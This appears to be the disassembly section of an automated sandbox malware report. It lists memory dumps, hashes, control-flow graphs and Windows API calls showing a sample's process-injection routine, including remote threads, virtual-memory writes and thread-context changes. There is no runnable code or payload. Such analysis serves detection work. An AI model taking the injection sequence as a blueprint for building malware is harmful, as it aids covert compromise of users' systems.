                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: e8d3f5087627997518507c251d007682c8d319c772c70274b596de497a758ebf
                                                          • Instruction ID: 1a7131626bba269e91d6a9e06c1969fc5d61128dcf9fe620aaca652ed0e1d85f
                                                          • Opcode Fuzzy Hash: e8d3f5087627997518507c251d007682c8d319c772c70274b596de497a758ebf
                                                          • Instruction Fuzzy Hash: B2E09273D02620A78711ABF4BC48C9BBBBDEF89761705041AFA00D7208C72598118BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(06898560,76C85520,76CC81D0,773BEEF0,0627E873,?), ref: 06278DD7
                                                          • lstrlen.KERNEL32(?), ref: 06278DDF
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(00000000,06898560), ref: 06278DF3
                                                          • lstrcat.KERNEL32(00000000,?), ref: 06278DFE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 6c0679c9ed42fb3c7ddd9fbb1d6f5d97451307c28520797014cca533c5a8766a
                                                          • Instruction ID: eef3b5f5dff5aed3d8175d1d2993de3681ad9144179194f7b42de8d4121e3fba
                                                          • Opcode Fuzzy Hash: 6c0679c9ed42fb3c7ddd9fbb1d6f5d97451307c28520797014cca533c5a8766a
                                                          • Instruction Fuzzy Hash: 07E0ED73A01725AB87529AA4AC4CC9FBBADEFC96693040916FB04E3100C72599058BF1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000013.00000003.338289640.0000016AD2E50000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016AD2E50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_3_16ad2e50000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 31d9662255b7f249616ceadde9cc10f7be338c06862ab3e0198782b9ef533960
                                                          • Instruction ID: 3d0b36a34807be66aec4066947b7ab3a62546e34c8849a56c77563e3ea26bc46
                                                          • Opcode Fuzzy Hash: 31d9662255b7f249616ceadde9cc10f7be338c06862ab3e0198782b9ef533960
                                                          • Instruction Fuzzy Hash: 7AB0120447FBC24ED70313B30C6529D2F60AE4B224FC959C79045D5097E40D058D9333
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000013.00000003.338289640.0000016AD2E50000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016AD2E50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_3_16ad2e50000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                          • Instruction ID: b536561196103fe8a7c4cd41dfc3e93c69bcdbe6822835afccc1767bb959815d
                                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                          • Instruction Fuzzy Hash: F69002154A540655D41411E24C4529C5441678D260FD484805516A0548D84E02965563
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph (rendered graph data not reproduced): function 529660-529d1a; API calls on the graph: NtUnmapViewOfSection, NtClose, NtSetContextThread; internal calls: 5460dc, 53583c, 5341d8, 546c4c, 52b7b8, 545684, 5225c0, 52e53c, 5404cc, 526d24
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                                                          • Instruction ID: 1e0760eba7ddea2beb580bbbe32f25167dc9049e416f41c20e686c7195a255de
                                                          • Opcode Fuzzy Hash: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                                                          • Instruction Fuzzy Hash: 45128130618E598FDB69EF28E8856A677E1FF99301F50062DE44AC3291EF34EC41CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph (rendered graph data not reproduced): function 5265e4-526735; API calls on the graph: NtQueryInformationToken, NtClose; internal calls: 52e53c, 52b7b8
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: InformationQueryToken$Close
                                                          • String ID: 0
                                                          • API String ID: 459398573-4108050209
                                                          • Opcode ID: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                                                          • Instruction ID: 11a9e1b2c8b51387fad2660dd01c74371bddf8d7e03977b3350c6f2b06d162b8
                                                          • Opcode Fuzzy Hash: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                                                          • Instruction Fuzzy Hash: 69311C31218B488FD764EF19D8C8B9ABBE5FBD9301F50492EE58EC3250DB349945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph (rendered graph data not reproduced): function 52aa6c-52ac54; API calls on the graph: NtSetInformationProcess, CreateRemoteThread, ResumeThread, FindCloseChangeNotification; internal calls: 52495c, 546e10, 52eca8, 5471e8
                                                          APIs
                                                          • NtSetInformationProcess.NTDLL ref: 0052AB14
                                                          • CreateRemoteThread.KERNELBASE ref: 0052ABBA
                                                          • FindCloseChangeNotification.KERNELBASE ref: 0052AC0C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
                                                          • String ID:
                                                          • API String ID: 1964589409-0
                                                          • Opcode ID: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                                                          • Instruction ID: 44f7c0f7c389af30284d334a568a3b8f11e2962a210e0e0be5b28e99c1aef110
                                                          • Opcode Fuzzy Hash: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                                                          • Instruction Fuzzy Hash: BD51C831618F158FE728EF68E8996667BE1FF99305F10452DE94AC3291EE34DC41CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 52eef8-52ef77 324 52ef79-52efab call 52e53c 321->324 325 52efad-52efae 321->325 327 52efb0-52efb3 324->327 325->327 329 52fb22-52fb3e 327->329 330 52efb9-52efe2 CreateMutexExA 327->330 333 52f000-52f003 330->333 334 52efe4-52efe9 330->334 335 52f009-52f030 333->335 336 52fb1f-52fb20 333->336 337 52efeb-52eff8 334->337 338 52effd-52effe 334->338 341 52f036-52f082 335->341 342 52f0f7-52f0f8 335->342 336->329 337->336 338->333 356 52f084-52f08b 341->356 357 52f099-52f0a9 341->357 343 52f0fa-52f0fd 342->343 343->329 345 52f103-52f144 343->345 348 52f14a-52f150 345->348 349 52f1e8-52f1e9 345->349 352 52f152-52f160 348->352 353 52f1be-52f1e6 call 533bc8 348->353 350 52f1eb-52f1ee 349->350 350->329 355 52f1f4-52f20f GetUserNameA 350->355 358 52f162-52f1aa 352->358 353->350 361 52f240-52f252 355->361 362 52f211-52f22d 355->362 356->357 363 52f08d-52f093 call 54b2cc 356->363 360 52f0af-52f0d8 357->360 364 52f1b6-52f1bc 358->364 365 52f1ac-52f1b0 358->365 373 52f0da-52f0f5 360->373 366 52f254-52f259 361->366 367 52f25b-52f2a4 361->367 362->361 374 52f22f-52f238 362->374 363->357 364->353 364->358 365->364 366->367 371 52f2c6-52f2cb 366->371 383 52f2a6-52f2af 367->383 384 52f2b7-52f2b8 367->384 375 52f30d-52f310 371->375 376 52f2cd-52f2ee 371->376 373->343 374->361 378 52f312-52f322 call 52b7b8 375->378 379 52f327-52f35e 375->379 392 52f302-52f30a 376->392 393 52f2f0-52f2f7 376->393 378->379 386 52f360-52f380 379->386 387 52f3c1 379->387 395 52f3e4-52f3f0 383->395 396 52f2b5 383->396 391 52f2c0 384->391 403 52f386-52f3a4 call 52ccc8 386->403 389 52f3c6-52f3c9 387->389 389->329 394 52f3cf-52f3d2 389->394 391->371 392->375 393->392 398 52f2f9-52f300 393->398 399 52f3d4 call 53b4b0 394->399 400 52f3db-52f3de 394->400 401 52f3f2-52f423 call 54ba3c 395->401 402 52f46a-52f47c call 549604 395->402 396->391 398->375 409 52f3d9 399->409 400->329 400->395 401->402 414 52f425-52f42d 401->414 412 52f4b6-52f4c8 call 5498a8 402->412 413 52f47e-52f4af call 54ba3c 402->413 415 52f3b3 403->415 416 52f3a6-52f3af 403->416 409->400 424 52f4d0-52f517 call 53d43c call 53ac88 412->424 413->424 425 52f4b1-52f4b2 413->425 414->402 420 52f42f-52f464 call 53ef6c 414->420 417 52f3b8-52f3bf 415->417 416->403 421 52f3b1 416->421 417->389 420->402 421->417 433 52f540-52f543 call 54b4d0 424->433 434 52f519-52f538 424->434 425->412 437 52f548-52f54d 433->437 434->433 437->329 438 52f553-52f56c 437->438 438->329 440 52f572-52f59a 438->440 442 52f5c0-52f5ea call 5426bc 440->442 443 52f59c-52f5b1 440->443 448 52f5f9-52f608 442->448 449 52f5ec-52f5f4 442->449 443->442 447 52f5b3-52f5bb 443->447 447->329 450 52f8d1-52f8d8 448->450 451 52f60e-52f644 call 533bc8 448->451 449->329 453 52fa60-52fa69 450->453 454 52f8de-52f902 call 547004 450->454 471 52f651-52f654 451->471 472 52f646-52f64d 451->472 453->336 456 52fa6f-52fa74 453->456 463 52f9a5-52f9c6 call 547004 454->463 464 52f908-52f928 call 548678 454->464 459 52fae6-52fb14 call 5426bc 456->459 460 52fa76-52fa79 456->460 459->449 475 52fb1a-52fb1c 459->475 465 52fa8b-52faa8 460->465 466 52fa7b-52fa85 460->466 463->453 481 52f9cc-52f9e9 call 548678 463->481 464->463 482 52f92a-52f937 464->482 465->459 479 52faaa-52fadc 465->479 466->465 471->329 474 52f65a-52f727 call 546b44 * 4 471->474 472->471 506 52f795-52f798 474->506 507 52f729-52f730 474->507 475->336 479->459 481->453 490 52f9eb-52f9f8 481->490 485 52f993-52f99d 482->485 486 52f939-52f97e call 540c58 call 5448d4 482->486 485->463 486->485 505 52f980-52f98e call 53f5d8 486->505 493 52f9fa-52fa40 call 540c58 call 5448d4 490->493 494 52fa4e-52fa58 490->494 493->494 515 52fa42-52fa49 call 53b24c 493->515 494->453 505->485 506->329 510 52f79e-52f7a5 506->510 507->506 511 52f732-52f74d 507->511 513 52f7a7-52f7b6 510->513 514 52f7bc-52f7db 510->514 519 52f757-52f783 call 5426bc 511->519 520 52f74f-52f755 511->520 513->514 522 52f81b-52f85b 514->522 523 52f7dd-52f816 call 52fe20 514->523 515->494 519->506 529 52f785-52f78b 519->529 527 52f793 520->527 530 52f89e-52f8a4 522->530 531 52f85d-52f87a call 5426bc 522->531 523->522 527->506 529->527 538 52f8a6-52f8a9 530->538 536 52f883-52f89c 531->536 537 52f87c-52f881 531->537 536->538 537->538 538->329 539 52f8af-52f8ba 538->539 539->453 540 52f8c0-52f8cc call 526274 539->540 540->453
                                                          APIs
                                                          • CreateMutexExA.KERNEL32 ref: 0052EFC5
                                                          • GetUserNameA.ADVAPI32 ref: 0052F1FE
                                                            • Part of subcall function 005426BC: CreateThread.KERNELBASE ref: 005426EC
                                                            • Part of subcall function 005426BC: QueueUserAPC.KERNELBASE ref: 00542703
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateUser$MutexNameQueueThread
                                                          • String ID:
                                                          • API String ID: 2503873790-0
                                                          • Opcode ID: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                                                          • Instruction ID: 1cd9619045f40465fb4f42ec7c93818d7efb85d558fab21d61f2fae36d3f6c38
                                                          • Opcode Fuzzy Hash: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                                                          • Instruction Fuzzy Hash: BA72A375619A188FE728EF28FC8956977E1F799700B20853ED44BC32A1DE38D947CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 597 53583c-53587e 599 535884-5358c7 597->599 600 535a4f 597->600 604 535a3b-535a4d 599->604 605 5358cd-5358ec 599->605 601 535a54-535a77 600->601 604->601 605->604 608 5358f2-535911 605->608 608->604 610 535917-535936 608->610 610->604 612 53593c-53595b 610->612 612->604 614 535961-5359e3 call 52e53c NtCreateSection 612->614 617 5359e5-535a02 call 5341d8 614->617 618 535a2a-535a2f 614->618 622 535a20-535a28 617->622 623 535a04-535a1e call 52e53c 617->623 624 535a31-535a33 618->624 622->624 623->624 624->604 626 535a35-535a39 624->626 626->601
                                                          APIs
                                                          • NtCreateSection.NTDLL ref: 005359DE
                                                            • Part of subcall function 005341D8: NtMapViewOfSection.NTDLL ref: 00534224
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateView
                                                          • String ID: 0
                                                          • API String ID: 1585966358-4108050209
                                                          • Opcode ID: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                                                          • Instruction ID: 7889b315d99e4ff8b6a48d751e1c6bd41b59552ac755a40316e904b70a055ed6
                                                          • Opcode Fuzzy Hash: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                                                          • Instruction Fuzzy Hash: 3461B37021CF098FDB54EF68D8C9A6577E1FB99305F104A6EE84AC7261EB34D941CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 629 5404cc-5404e0 630 540526-54052e 629->630 631 5404e2-54050d NtAllocateVirtualMemory 629->631 632 540521-540522 631->632 633 54050f-54051f 631->633 632->630 633->630
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL ref: 00540509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID: @
                                                          • API String ID: 2167126740-2766056989
                                                          • Opcode ID: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                                                          • Instruction ID: 99fe9aec71cd83b8d5168b7adbd617200fa4afedc4c1c7fa7cc6286c25d66a76
                                                          • Opcode Fuzzy Hash: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                                                          • Instruction Fuzzy Hash: 17F09070614A048BDB489FF8D8CC6BA7BE0FB9C305F50096DE20ACB294DB78C9048B45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 636 55f002-55f063 638 55f33d-55f355 636->638 639 55f069-55f082 636->639 646 55f358-55f36a 638->646 640 55f237-55f282 NtProtectVirtualMemory 639->640 641 55f088-55f091 639->641 642 55f31c-55f31e 640->642 643 55f288-55f289 640->643 641->640 644 55f097-55f09f 641->644 642->646 649 55f320-55f33b 642->649 647 55f28d-55f28f 643->647 648 55f0a2-55f0ae 644->648 647->646 650 55f295-55f299 647->650 651 55f0b0-55f0b1 648->651 652 55f0cc-55f0fa 648->652 649->646 653 55f2b1-55f2b5 650->653 654 55f29b-55f2af 650->654 655 55f0b3-55f0ca 651->655 661 55f100-55f111 652->661 662 55f228-55f229 652->662 658 55f2b7-55f2cb 653->658 659 55f2cd-55f2ce 653->659 657 55f2d0-55f316 NtProtectVirtualMemory 654->657 655->652 655->655 657->642 657->647 658->657 659->657 663 55f113-55f118 661->663 664 55f11e-55f13a 661->664 665 55f22e-55f231 662->665 663->664 666 55f204-55f205 663->666 667 55f140-55f17e 664->667 668 55f20c-55f220 664->668 665->640 665->646 666->668 672 55f1a7-55f1c3 667->672 673 55f180-55f188 667->673 668->648 669 55f226 668->669 669->665 677 55f1c5 672->677 678 55f1c8-55f1ca 672->678 674 55f193-55f1a4 673->674 675 55f18a-55f191 673->675 674->672 675->674 675->675 677->678 679 55f1cc-55f1ee 678->679 680 55f1fe-55f1ff 678->680 679->668 681 55f1f0-55f1f9 679->681 680->666 681->667
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0055F27A
                                                          • NtProtectVirtualMemory.NTDLL ref: 0055F309
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.471575399.000000000055F000.00000040.80000000.00040000.00000000.sdmp, Offset: 0055F000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_55f000_control.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: f1dedb5b21cf42e558672d1ecf6caf272f67ae8676b0b0c27b8776a1df3852d2
                                                          • Instruction ID: 69509d829802f1d1ac61ba5942002552770146c3e93c5185859a29c79acc0114
                                                          • Opcode Fuzzy Hash: f1dedb5b21cf42e558672d1ecf6caf272f67ae8676b0b0c27b8776a1df3852d2
                                                          • Instruction Fuzzy Hash: 06A1053120CB884FC725DF28DC956AABBE1FB95311F58497FD8CBC7252D634A84A8742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 714 52b11c-52b153 RtlAllocateHeap 715 52b2e6-52b300 714->715 716 52b159-52b199 call 52e53c NtQueryInformationProcess 714->716 719 52b2d4-52b2de 716->719 720 52b19f-52b1c9 call 5240c0 716->720 719->715 720->719 723 52b1cf-52b1da 720->723 723->719 724 52b1e0-52b203 call 5240c0 723->724 724->719 727 52b209-52b230 call 5240c0 724->727 727->719 730 52b236-52b25c 727->730 730->719 731 52b25e-52b262 730->731 731->719 732 52b264-52b28b call 5240c0 731->732 732->719 735 52b28d-52b294 732->735 736 52b296-52b297 735->736 737 52b29b-52b29e 735->737 736->737 737->719 738 52b2a0-52b2c0 call 5240c0 737->738 738->719 741 52b2c2-52b2c4 738->741 742 52b2c6-52b2c8 741->742 743 52b2ca-52b2cb 741->743 744 52b2cd-52b2d1 742->744 743->744 744->719
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0052B147
                                                          • NtQueryInformationProcess.NTDLL ref: 0052B191
                                                            • Part of subcall function 005240C0: NtReadVirtualMemory.NTDLL ref: 005240DF
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeapInformationMemoryProcessQueryReadVirtual
                                                          • String ID:
                                                          • API String ID: 886377554-0
                                                          • Opcode ID: bb52a1fff10a7dd98ec3da78456525eea07a30f3c88382e4ce150ea65ee021ba
                                                          • Instruction ID: 8ca625b908815d97298a255a51425885fd1815f9790377637936e499b3295c25
                                                          • Opcode Fuzzy Hash: bb52a1fff10a7dd98ec3da78456525eea07a30f3c88382e4ce150ea65ee021ba
                                                          • Instruction Fuzzy Hash: 6B51933121CB598BEB19EB28E8957AA77E5FFD9301F04452EA84DC3285DF34D941CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                                                          • Instruction ID: 52793fad069a9e477cc90b44ee751153eee04448226f2113667cfa1359fa7980
                                                          • Opcode Fuzzy Hash: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                                                          • Instruction Fuzzy Hash: E1819630718B198FF768EF28E89976A37E5FB95311F24452DD44AC32A1EF74E8428741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 0054A16E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                                                          • Instruction ID: 20df7d3ea60cee5c3a944c090a35ad79f087f96151b905a15d5305a0ddd49d60
                                                          • Opcode Fuzzy Hash: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                                                          • Instruction Fuzzy Hash: 90018130358E0D8FDBC4EF68D5C4BA6B7E4FBA8309B40156EA40AC3168D734D881CB02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction ID: 4c5ee55db34c3be9391e4a6ac9338d2aaae18f89219d58e681fafe4f41504c68
                                                          • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction Fuzzy Hash: 7C01D2B0A08B048FCB48EF69D0C8569BBE1FB98311F50066FE949CB796DB70D885CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: MemoryReadVirtual
                                                          • String ID:
                                                          • API String ID: 2834387570-0
                                                          • Opcode ID: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                                                          • Instruction ID: 4fe34f220971d8781f256ebe602b50afa4ee38f1b152eaa3c3df8410c0e582f6
                                                          • Opcode Fuzzy Hash: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                                                          • Instruction Fuzzy Hash: FAE0D8347157804BE7005BB49CCD63D37D4FB89305F104839ED41CB360C62EC8908701
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL ref: 00526D43
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                                                          • Instruction ID: 241d8a2e39fabec06b0b503b682e62caa0d29b409ac5811ade0d391f56798a30
                                                          • Opcode Fuzzy Hash: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                                                          • Instruction Fuzzy Hash: C9E0D8347156484BDB10AFB498CC23877D0FB88301F10083AE545C3364C629C8854742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 144 52eca8-52ed1b call 52e53c call 52495c 149 52ed43-52ed4e 144->149 150 52ed1d-52ed3d call 529660 144->150 152 52ed50-52ed56 call 52b11c 149->152 153 52ed5e-52ed80 call 5240c0 149->153 150->149 157 52eec7-52eecb 150->157 158 52ed5b-52ed5c 152->158 162 52ed86-52ed8c 153->162 163 52eebf-52eec5 153->163 160 52eed7-52eef4 157->160 161 52eecd-52eece 157->161 158->153 161->160 164 52ed92-52edb7 VirtualProtectEx 162->164 165 52eeb8-52eebd 162->165 163->157 167 52edd3 164->167 168 52edb9-52edd1 call 524a48 164->168 165->157 169 52edd5-52edd7 167->169 168->169 169->163 171 52eddd-52ede3 169->171 173 52ede8-52ee22 ResumeThread SuspendThread 171->173 175 52ee37-52ee39 173->175 176 52ee24-52ee2f 173->176 177 52ee45-52ee4d 175->177 178 52ee3b-52ee43 175->178 176->175 180 52ee56-52ee6d call 529660 177->180 181 52ee4f-52ee54 177->181 178->173 178->177 182 52ee6f-52ee9c VirtualProtectEx 180->182 181->182 182->157 184 52ee9e-52eeb6 call 524a48 182->184 184->157
                                                          APIs
                                                            • Part of subcall function 0052495C: FindCloseChangeNotification.KERNELBASE ref: 00524A08
                                                          • VirtualProtectEx.KERNELBASE ref: 0052EDAF
                                                          • ResumeThread.KERNELBASE ref: 0052EDEC
                                                          • SuspendThread.KERNELBASE ref: 0052EE0F
                                                          • VirtualProtectEx.KERNELBASE ref: 0052EE8C
                                                            • Part of subcall function 00524A48: VirtualProtectEx.KERNELBASE ref: 00524A9C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual$Thread$ChangeCloseFindNotificationResumeSuspend
                                                          • String ID:
                                                          • API String ID: 4107391026-0
                                                          • Opcode ID: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                                                          • Instruction ID: 87c7a3aa39c0bc72ac2808ad44c639516c18c05ec2737548700b5c21d6c146f7
                                                          • Opcode Fuzzy Hash: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                                                          • Instruction Fuzzy Hash: 2261C03161CA588FD768EF28E8867AA77D5FB9A301F10052DE58FC3281DF34D9468B46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
